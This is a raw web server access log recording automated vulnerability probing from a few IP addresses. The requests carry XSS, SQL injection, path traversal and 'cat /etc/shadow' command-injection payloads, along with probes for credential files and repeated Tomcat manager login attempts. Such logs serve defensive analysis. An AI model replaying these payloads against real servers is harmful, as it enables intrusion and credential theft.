107.189.31.184 - - [17/Jun/2023:22:58:31 +0530] "GET /_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:22:58:33 +0530] "GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:22:58:34 +0530] "GET /app_dev.php/_profiler/empty/search/results?limit=10 HTTP/1.1" 404 1078
107.189.31.184 - - [17/Jun/2023:22:58:39 +0530] "GET /Visitor/bin/WebStrings.srf?file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:22:58:39 +0530] "GET /Visitor/bin/WebStrings.srf?file&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:22:59:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:59:26 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:23:00:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:01:23 +0530] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 1096
107.189.31.184 - - [17/Jun/2023:23:01:23 +0530] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 404 1096
107.189.31.184 - - [17/Jun/2023:23:01:37 +0530] "GET /plesk-stat/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:01:37 +0530] "GET /plesk-stat/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:02:03 +0530] "GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:23:02:04 +0530] "GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:23:02:05 +0530] "GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:02:06 +0530] "GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:02:38 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:23:02:38 +0530] "GET null null" 400 -
83.97.73.89 - - [17/Jun/2023:23:03:15 +0530] "GET /geoserver HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:23:03:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:23:03:33 +0530] "GET /geoserver HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:23:04:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:07:07 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:07:07 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:07:26 +0530] "GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:23:07:27 +0530] "GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1" 404 1122
41.186.73.134 - - [17/Jun/2023:23:07:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:08:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:11:18 +0530] "POST /xmlrpc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:23:11:23 +0530] "POST /xmlrpc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:23:11:34 +0530] "GET /mailsms/s?dumpConfig=/&func=ADMIN:appState HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:23:11:35 +0530] "GET /mailsms/s?dumpConfig=/&func=ADMIN:appState HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:23:11:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:12:28 +0530] "GET /?p=1&xsg-format=yyy&xsg-page=pp&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-type=zz HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:12:29 +0530] "GET /?p=1&xsg-format=yyy&xsg-page=pp&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-type=zz HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:12:30 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:23:12:32 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:23:13:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:15 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:23:13:20 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:23:14:12 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:14:13 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:15:19 +0530] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:23:15:19 +0530] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:23:15:53 +0530] "GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:23:15:53 +0530] "GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1124
41.186.73.134 - - [17/Jun/2023:23:16:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:17:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:19:16 +0530] "GET /html/device-id HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:23:19:17 +0530] "GET /html/device-id HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:23:20:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:20:21 +0530] "GET /ADSearch.cc?methodToCall=search HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:20:21 +0530] "GET /ADSearch.cc?methodToCall=search HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:21:19 +0530] "GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1084
41.186.73.134 - - [17/Jun/2023:23:21:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:21:20 +0530] "GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:23:21:21 +0530] "GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:23:21:22 +0530] "GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:23:21:31 +0530] "GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:23:21:32 +0530] "GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:23:22:33 +0530] "GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:22:34 +0530] "GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:23:01 +0530] "GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:23:23:02 +0530] "GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:23:24:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
141.98.11.207 - - [17/Jun/2023:23:24:58 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:23:25:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
141.98.11.207 - - [17/Jun/2023:23:26:29 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:23:27:22 +0530] "GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:27:22 +0530] "GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1" 404 1044
206.189.196.2 - - [17/Jun/2023:23:28:04 +0530] "GET /ui/authentication HTTP/1.1" 404 1028
206.189.196.2 - - [17/Jun/2023:23:28:04 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
107.189.31.184 - - [17/Jun/2023:23:28:36 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:23:28:36 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:23:28:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:29:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:30:35 +0530] "GET /listconf?command=conf HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:30:36 +0530] "GET /listconf?command=conf HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:31:57 +0530] "GET /cobbler/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:31:58 +0530] "GET /cobbler/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:23:31:59 +0530] "GET /cblr/ HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:23:32:00 +0530] "GET /cblr/ HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:23:32:16 +0530] "GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1" 404 1112
107.189.31.184 - - [17/Jun/2023:23:32:17 +0530] "GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1" 404 1112
151.238.158.80 - - [17/Jun/2023:23:32:24 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:23:32:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:33:16 +0530] "GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:23:33:17 +0530] "GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1" 404 1032
41.186.73.134 - - [17/Jun/2023:23:33:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:35:43 +0530] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:35:45 +0530] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:35:46 +0530] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:35:48 +0530] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:23:36:59 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:23:37:01 +0530] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:23:37:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:38:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:40:58 +0530] "POST /api/admin/login HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:23:40:59 +0530] "POST /api/admin/login HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:23:41:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:41:30 +0530] "GET /cfcache.map HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:23:41:31 +0530] "GET /cfcache.map HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:23:42:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:43:11 +0530] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:23:43:12 +0530] "POST /OA_HTML/lcmServiceController.jsp HTTP/1.1" 404 1058
107.189.31.184 - - [17/Jun/2023:23:45:05 +0530] "GET /wp-admin/admin-ajax.php?action=aux_the_recent_products&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E&data[wp_query_args][post_type]=post HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:23:45:06 +0530] "GET /wp-admin/admin-ajax.php?action=aux_the_recent_products&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E&data[wp_query_args][post_type]=post HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:23:45:14 +0530] "GET /photoalbum/index.php?url=../../../../../../../../../../../../etc/passwd%00&urlancien HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:23:45:15 +0530] "GET /photoalbum/index.php?url=../../../../../../../../../../../../etc/passwd%00&urlancien HTTP/1.1" 404 1034
41.186.73.134 - - [17/Jun/2023:23:45:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:46:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:49:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:50:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:50:53 +0530] "POST /atutor/login.php HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:23:50:53 +0530] "POST /atutor/login.php HTTP/1.1" 404 1026
45.156.128.12 - - [17/Jun/2023:23:50:56 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
107.189.31.184 - - [17/Jun/2023:23:51:23 +0530] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:23:51:24 +0530] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:23:52:42 +0530] "GET /register/?redirect_to=https://interact.sh/ HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:23:52:42 +0530] "GET /register/?redirect_to=https://interact.sh/ HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:23:53:11 +0530] "GET /credentials.json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:23:53:12 +0530] "GET /credentials.json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:23:53:14 +0530] "GET /assets/credentials.json HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:23:53:15 +0530] "GET /assets/credentials.json HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:23:53:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:23:54:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:55:47 +0530] "GET /anything_here HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:23:55:47 +0530] "GET /anything_here HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:23:56:06 +0530] "site cpfr null" 400 -
107.189.31.184 - - [17/Jun/2023:23:56:06 +0530] "site cpfr null" 400 -
41.186.73.134 - - [17/Jun/2023:23:58:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:23:58:46 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:23:59:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:23:59:22 +0530] "GET /config/database.yml HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:23:59:23 +0530] "GET /config/database.yml HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:23:59:45 +0530] "GET /apiserver-etcd-client.key HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:23:59:46 +0530] "GET /apiserver-etcd-client.key HTTP/1.1" 404 1044